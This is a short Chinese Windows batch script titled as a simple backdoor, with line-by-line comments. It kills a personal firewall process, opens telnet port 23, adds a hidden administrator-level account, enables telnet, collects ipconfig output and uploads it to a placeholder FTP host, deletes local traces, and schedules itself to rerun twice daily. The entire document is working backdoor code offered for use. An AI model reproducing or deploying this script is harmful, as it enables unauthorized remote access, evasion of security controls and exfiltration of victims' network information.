简易后门
echo ***************** | 说明 |
echo 关闭天网防火墙 | |
taskkill /f /im pfw.exe | |
echo ************** | |
echo 在windows默认防火墙上打开tenlet使用的23端口 | |
netsh firewall add portopening tcp 23 telnet | |
echo ******************* | |
echo 添加一个近似管理员administrator的帐号 | |
net user administrator /add | |
net localgroup administrators administrator /add | |
echo ********************* | |
echo 启动telnet服务 | |
sc config tlntsvr start= auto | |
net start telnet | |
echo *************** | |
echo 自动将ip地址发送至指定的位置 | |
echo 检测是否存在指定的文件,如果有,则跳到删除操作 | |
if exist f:\temp\abc.txt goto next | |
if exist f:\temp\ip.txt goto next | |
goto next1 | |
:next | |
del f:\temp\abc.txt | |
del f:\temp\ip.txt | |
:next1 | |
echo 将IP地址保存至ip.txt这个文件 | |
ipconfig /all >>ip.txt | |
echo 制作FTP执行脚本,用户可以自行扩充 | |
echo 登录FTP服务器 | |
echo open youftp.com >>f:\temp\abc.txt | |
echo ftpUsername >>f:\temp\abc.txt | |
echo ftp password >>f:\temp\abc.txt | |
echo binary >>f:\temp\abc.txt | |
echo 删除FTP上旧的ip.txt文件,并上传新的ip.txt文件 | |
echo delete ip.txt >>f:\temp\abc.txt | |
echo f:\temp\ip.txt >>f:\temp\abc.txt | |
echo put f:\temp\ip.txt >>f:\temp\abc.txt | |
echo bye >>f:\temp\abc.txt | |
echo 执行前面定义的FTP脚本 | |
ftp -s:f:\temp\abc.txt | |
echo 清除本地痕迹 | |
del f:\temp\abc.txt | |
del f:\temp\ip.txt | |
echo *************** | |
echo 启动定时执行服务 | |
sc config schedule start= auto | |
net start schedule | |
@at 10:03 %systemroot%\system32\sample18.bat | |
@at 20:03 %systemroot%\system32\sample18.bat | |
exit |